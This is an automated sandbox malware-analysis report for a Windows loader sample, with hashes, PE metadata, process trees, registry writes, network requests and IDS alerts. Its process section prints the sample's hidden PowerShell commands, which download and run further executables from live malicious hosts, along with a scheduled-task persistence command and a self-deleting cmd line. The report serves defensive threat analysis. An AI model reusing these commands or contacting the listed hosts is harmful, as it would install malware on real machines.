analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

6e3

Full analysis: https://app.any.run/tasks/33227f40-b018-4d43-bda9-88cb2c208b6e
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: April 15, 2019, 08:38:05
OS: Windows 7 Professional Service Pack 1 (build: 7601, 64 bit)
Tags:
loader
Indicators:
MIME: application/x-dosexec
File info: PE32 executable (GUI) Intel 80386, for MS Windows
MD5:

C098E1E82FC8FABE885FD01612447346

SHA1:

B1F2D623E1600ACAF4B336DA933C4523EC6111E0

SHA256:

6E31930FAEDC5F5C655A33F745425471E0C52996BAA9D07E4AF20657057BBBA8

SSDEEP:

24576:cAHnh+eWsN3skA4RV1Hom2KXMmHayahjGlXx7FbLlhyN6OJ5p:7h+ZkldoPK8YayYp

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Uses Task Scheduler to run other applications

      • 6e3.exe (PID: 2832)
    • Writes to a start menu file

      • 6e3.exe (PID: 1228)
      • setup_hvc.exe (PID: 1844)
    • Loads the Task Scheduler COM API

      • schtasks.exe (PID: 1408)
    • Application was dropped or rewritten from another process

      • setup_hvc.exe (PID: 1844)
      • setup_hvc.exe (PID: 768)
      • setup_hvc.exe (PID: 2856)
      • setup_hvc.exe (PID: 1996)
      • setup_hvc.exe (PID: 2992)
      • setup_hvc.exe (PID: 2300)
      • setup_hvc.exe (PID: 908)
      • setup_socks.exe (PID: 836)
      • setup_socks.exe (PID: 1976)
      • setup_socks.exe (PID: 2776)
      • setup_socks.exe (PID: 2108)
      • setup_socks.exe (PID: 2644)
      • setup_socks.exe (PID: 2984)
      • setup_socks.exe (PID: 1484)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 1904)
      • powershell.exe (PID: 2144)
  • SUSPICIOUS

    • Application launched itself

      • 6e3.exe (PID: 1228)
      • setup_hvc.exe (PID: 1844)
      • setup_socks.exe (PID: 2776)
      • taskmgr.exe (PID: 2120)
    • Executable content was dropped or overwritten

      • 6e3.exe (PID: 1228)
      • 6e3.exe (PID: 2832)
      • powershell.exe (PID: 1904)
      • setup_hvc.exe (PID: 1844)
      • powershell.exe (PID: 2144)
    • Creates files in the user directory

      • 6e3.exe (PID: 1228)
      • 6e3.exe (PID: 2832)
      • powershell.exe (PID: 992)
      • powershell.exe (PID: 1904)
      • setup_hvc.exe (PID: 1844)
      • powershell.exe (PID: 2144)
      • powershell.exe (PID: 1492)
      • powershell.exe (PID: 2300)
    • Starts CMD.EXE for commands execution

      • 6e3.exe (PID: 1228)
      • setup_hvc.exe (PID: 1844)
      • setup_socks.exe (PID: 2776)
    • Executes PowerShell scripts

      • 6e3.exe (PID: 2832)
    • Reads the machine GUID from the registry

      • taskmgr.exe (PID: 2120)
  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (64.6)
.dll | Win32 Dynamic Link Library (generic) (15.4)
.exe | Win32 Executable (generic) (10.5)
.exe | Generic Win/DOS Executable (4.6)
.exe | DOS Executable Generic (4.6)

EXIF

EXE

ProductVersion: 4.6.8.2
ProductName: -
LegalCopyright: -
FileVersion: 3.4.9.6
CompanyName: CapabilityAccessManagerClient
OriginalFileName: -
FileDescription: AssignedAccess
CharacterSet: Unicode
LanguageCode: English (U.S.)
FileSubtype: -
ObjectFileType: Dynamic link library
FileOS: Win32
FileFlags: (none)
FileFlagsMask: 0x0000
ProductVersionNumber: 1.0.0.0
FileVersionNumber: 1.0.0.0
Subsystem: Windows GUI
SubsystemVersion: 5.1
ImageVersion: -
OSVersion: 5.1
EntryPoint: 0x2800a
UninitializedDataSize: -
InitializedDataSize: 1334272
CodeSize: 581632
LinkerVersion: 12
PEType: PE32
TimeStamp: 2019:04:13 18:44:10+02:00
MachineType: Intel 386 or later, and compatibles

Summary

Architecture: IMAGE_FILE_MACHINE_I386
Subsystem: IMAGE_SUBSYSTEM_WINDOWS_GUI
Compilation Date: 13-Apr-2019 16:44:10
Detected languages:
  • English - United Kingdom
  • English - United States
FileDescription: AssignedAccess
OriginalFilename: -
CompanyName: CapabilityAccessManagerClient
FileVersion: 3.4.9.6
LegalCopyright: -
ProductName: -
ProductVersion: 4.6.8.2

DOS Header

Magic number: MZ
Bytes on last page of file: 0x0090
Pages in file: 0x0003
Relocations: 0x0000
Size of header: 0x0004
Min extra paragraphs: 0x0000
Max extra paragraphs: 0xFFFF
Initial SS value: 0x0000
Initial SP value: 0x00B8
Checksum: 0x0000
Initial IP value: 0x0000
Initial CS value: 0x0000
Overlay number: 0x0000
OEM identifier: 0x0000
OEM information: 0x0000
Address of NE header: 0x00000110

PE Headers

Signature: PE
Machine: IMAGE_FILE_MACHINE_I386
Number of sections: 5
Time date stamp: 13-Apr-2019 16:44:10
Pointer to Symbol Table: 0x00000000
Number of symbols: 0
Size of Optional Header: 0x00E0
Characteristics:
  • IMAGE_FILE_32BIT_MACHINE
  • IMAGE_FILE_EXECUTABLE_IMAGE
  • IMAGE_FILE_LARGE_ADDRESS_AWARE

Sections

Name
Virtual Address
Virtual Size
Raw Size
Charateristics
Entropy
.text
0x00001000
0x0008DFDD
0x0008E000
IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
6.67525
.rdata
0x0008F000
0x0002FD8E
0x0002FE00
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
5.76324
.data
0x000BF000
0x00008F74
0x00005200
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
1.19638
.rsrc
0x000C8000
0x00109830
0x00109A00
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
4.5432
.reloc
0x001D2000
0x00007134
0x00007200
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
6.78396

Resources

Title
Entropy
Size
Codepage
Language
Type
1
5.40026
1007
Latin 1 / Western European
English - United Kingdom
RT_MANIFEST
2
2.05883
296
Latin 1 / Western European
English - United Kingdom
RT_ICON
3
2.25499
296
Latin 1 / Western European
English - United Kingdom
RT_ICON
4
5.44265
1128
Latin 1 / Western European
English - United Kingdom
RT_ICON
5
5.25353
4264
Latin 1 / Western European
English - United Kingdom
RT_ICON
6
4.93647
9640
Latin 1 / Western European
English - United Kingdom
RT_ICON
7
3.34702
1428
Latin 1 / Western European
English - United Kingdom
RT_STRING
8
3.2817
1674
Latin 1 / Western European
English - United Kingdom
RT_STRING
9
3.28849
1168
Latin 1 / Western European
English - United Kingdom
RT_STRING
10
3.28373
1532
Latin 1 / Western European
English - United Kingdom
RT_STRING

Imports

ADVAPI32.dll
COMCTL32.dll
COMDLG32.dll
GDI32.dll
IPHLPAPI.DLL
KERNEL32.dll
MPR.dll
OLEAUT32.dll
PSAPI.DLL
SHELL32.dll
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
76
Monitored processes
30
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start 6e3.exe 6e3.exe schtasks.exe no specs powershell.exe cmd.exe no specs ping.exe no specs powershell.exe setup_hvc.exe setup_hvc.exe no specs setup_hvc.exe no specs setup_hvc.exe no specs setup_hvc.exe no specs setup_hvc.exe no specs setup_hvc.exe no specs cmd.exe no specs ping.exe no specs powershell.exe powershell.exe setup_socks.exe no specs setup_socks.exe no specs setup_socks.exe no specs setup_socks.exe no specs setup_socks.exe no specs setup_socks.exe no specs setup_socks.exe no specs cmd.exe no specs ping.exe no specs taskmgr.exe no specs taskmgr.exe powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
1228"C:\Users\admin\Desktop\6e3.exe" C:\Users\admin\Desktop\6e3.exe
explorer.exe
User:
admin
Company:
CapabilityAccessManagerClient
Integrity Level:
MEDIUM
Description:
AssignedAccess
Exit code:
0
Version:
3.4.9.6
2832"C:\Users\admin\Desktop\6e3.exe"C:\Users\admin\Desktop\6e3.exe
6e3.exe
User:
admin
Company:
CapabilityAccessManagerClient
Integrity Level:
MEDIUM
Description:
AssignedAccess
Version:
3.4.9.6
1408/c /Create /SC MINUTE /MO 14 /TN MSICable /TR "%appdata%\msi.exe" /FC:\Windows\SysWOW64\schtasks.exe6e3.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Manages scheduled tasks
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
992powershell -WindowStyle Hidden -nop -c "(New-Object System.Net.WebClient).DownloadString('http://79.174.12.127/socks/api/key?k=fSIwIjoiZXJvY3MiICwiIjoic3Ryb1BkZW5lcE8iICwiIjoiZW1hTnJldHVvciIgLCIwIjoicHR0aCIgLCIwIjoiNHMiICwiMCI6IjVzIiAsIjAiOiJuaW1kQSIgLCJuaW1kYSI6ImVtYU5yZXNVIiAsIjEyNDAwNDUyNSI6ImRpd2giICwidGliLTQ2IGxhbm9pc3NlZm9yUCA3IHN3b2RuaVciOiJuaXciICwiMy40LjEiOiIub2lzcmUjIns=');Start-Sleep -s 7;Stop-Process -Name "powershell";C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
6e3.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
4294967295
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2188"C:\Windows\system32\cmd.exe" /k ping 127.0.0.1 -t 0 & del C:\Users\admin\Desktop\6e3.exe & exit C:\Windows\SysWOW64\cmd.exe6e3.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2448ping 127.0.0.1 -t 0 C:\Windows\SysWOW64\PING.EXEcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
TCP/IP Ping Command
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1904powershell -WindowStyle Hidden -nop -c "(New-Object System.Net.WebClient).DownloadFile('http://freenac.org/setup_hvc.exe', 'C:\Users\admin\AppData\Roaming\setup_hvc.exe');Start-Sleep -s 7;Stop-Process -Name "powershell";C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
6e3.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
4294967295
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1844"C:\Users\admin\AppData\Roaming\setup_hvc.exe"C:\Users\admin\AppData\Roaming\setup_hvc.exe
6e3.exe
User:
admin
Company:
wbengine
Integrity Level:
MEDIUM
Description:
pwcreator
Exit code:
0
Version:
8.4.8.3
768"C:\Users\admin\AppData\Roaming\setup_hvc.exe"C:\Users\admin\AppData\Roaming\setup_hvc.exesetup_hvc.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
2856"C:\Users\admin\AppData\Roaming\setup_hvc.exe"C:\Users\admin\AppData\Roaming\setup_hvc.exesetup_hvc.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Total events
1 072
Read events
747
Write events
325
Delete events
0

Modification events

(PID) Process:(1228) 6e3.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(1228) 6e3.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(1228) 6e3.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(1228) 6e3.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(992) powershell.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\65\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(992) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(992) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(992) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(992) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileTracingMask
Value:
4294901760
(PID) Process:(992) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
4294901760
Executable files
5
Suspicious files
9
Text files
4
Unknown types
0

Dropped files

PID
Process
Filename
Type
992powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\WLQ6KNISTX3TFPAAX8UW.temp
MD5:
SHA256:
1904powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\41TU14AVVX61K47GFP6I.temp
MD5:
SHA256:
1492powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3UFOWCX87SP7ULX3A6RM.temp
MD5:
SHA256:
2144powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\8TC7M5EC7XMFAPJJXDH2.temp
MD5:
SHA256:
2300powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VD8WC1SOWRLR4U7D8T4H.temp
MD5:
SHA256:
1904powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1b7701.TMPbinary
MD5:624D987EA86A1F88017C11C6091D86A1
SHA256:E606898985C3979EEA302C45008C567BB05FF581F4D21275B199E698EE55629C
1904powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:624D987EA86A1F88017C11C6091D86A1
SHA256:E606898985C3979EEA302C45008C567BB05FF581F4D21275B199E698EE55629C
12286e3.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SlideToShutDown.urltext
MD5:F79A23CAF25E17C80DA4738664142845
SHA256:E28FD870498EF7D0A761B872F702E6B0118E0A529AD4457D6ADAD8D9E7302C6D
1844setup_hvc.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AppointmentActivation.urltext
MD5:C85D8228E003011963B1862EC5575786
SHA256:A839F0754941E4D649A1980DD9CE200772C194F618160070F7C18F40297CED21
992powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:624D987EA86A1F88017C11C6091D86A1
SHA256:E606898985C3979EEA302C45008C567BB05FF581F4D21275B199E698EE55629C
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
5
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1904
powershell.exe
GET
200
109.94.209.63:80
http://freenac.org/setup_hvc.exe
unknown
executable
2.15 Mb
suspicious
1492
powershell.exe
GET
200
79.174.12.127:80
http://79.174.12.127/socks/api/key?k=fSIwIjoiZXJvY3MiICwiIjoic3Ryb1BkZW5lcE8iICwiIjoiZW1hTnJldHVvciIgLCIwIjoicHR0aCIgLCIwIjoiNHMiICwiMCI6IjVzIiAsIjAiOiJuaW1kQSIgLCJuaW1kYSI6ImVtYU5yZXNVIiAsIjEyNDAwNDUyNSI6ImRpd2giICwidGliLTQ2IGxhbm9pc3NlZm9yUCA3IHN3b2RuaVciOiJuaXciICwiMy40LjEiOiIub2lzcmUjIns=
unknown
text
46 b
unknown
2144
powershell.exe
GET
200
109.94.209.63:80
http://freenac.org/setup_socks.exe
unknown
executable
1.26 Mb
suspicious
992
powershell.exe
GET
200
79.174.12.127:80
http://79.174.12.127/socks/api/key?k=fSIwIjoiZXJvY3MiICwiIjoic3Ryb1BkZW5lcE8iICwiIjoiZW1hTnJldHVvciIgLCIwIjoicHR0aCIgLCIwIjoiNHMiICwiMCI6IjVzIiAsIjAiOiJuaW1kQSIgLCJuaW1kYSI6ImVtYU5yZXNVIiAsIjEyNDAwNDUyNSI6ImRpd2giICwidGliLTQ2IGxhbm9pc3NlZm9yUCA3IHN3b2RuaVciOiJuaXciICwiMy40LjEiOiIub2lzcmUjIns=
unknown
text
44 b
unknown
2300
powershell.exe
GET
404
79.174.12.127:80
http://79.174.12.127/socks/api/key?k=fSIwIjoiZXJvY3MiICwiIjoic3Ryb1BkZW5lcE8iICwiIjoiZW1hTnJldHVvciIgLCIwIjoicHR0aCIgLCIwIjoiNHMiICwiMCI6IjVzIiAsIjAiOiJuaW1kQSIgLCJuaW1kYSI6ImVtYU5yZXNVIiAsIjEyNDAwNDUyNSI6ImRpd2giICwidGliLTQ2IGxhbm9pc3NlZm9yUCA3IHN3b2RuaVciOiJuaXciICwiMy40LjEiOiIub2lzcmUjIns=
unknown
text
3 b
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
992
powershell.exe
79.174.12.127:80
unknown
1904
powershell.exe
109.94.209.63:80
freenac.org
malicious
1492
powershell.exe
79.174.12.127:80
unknown
2144
powershell.exe
109.94.209.63:80
freenac.org
malicious
2300
powershell.exe
79.174.12.127:80
unknown

DNS requests

Domain
IP
Reputation
freenac.org
  • 109.94.209.63
suspicious

Threats

PID
Process
Class
Message
1904
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
1904
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
1904
powershell.exe
Generic Protocol Command Decode
SURICATA STREAM excessive retransmissions
2144
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2144
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
No debug info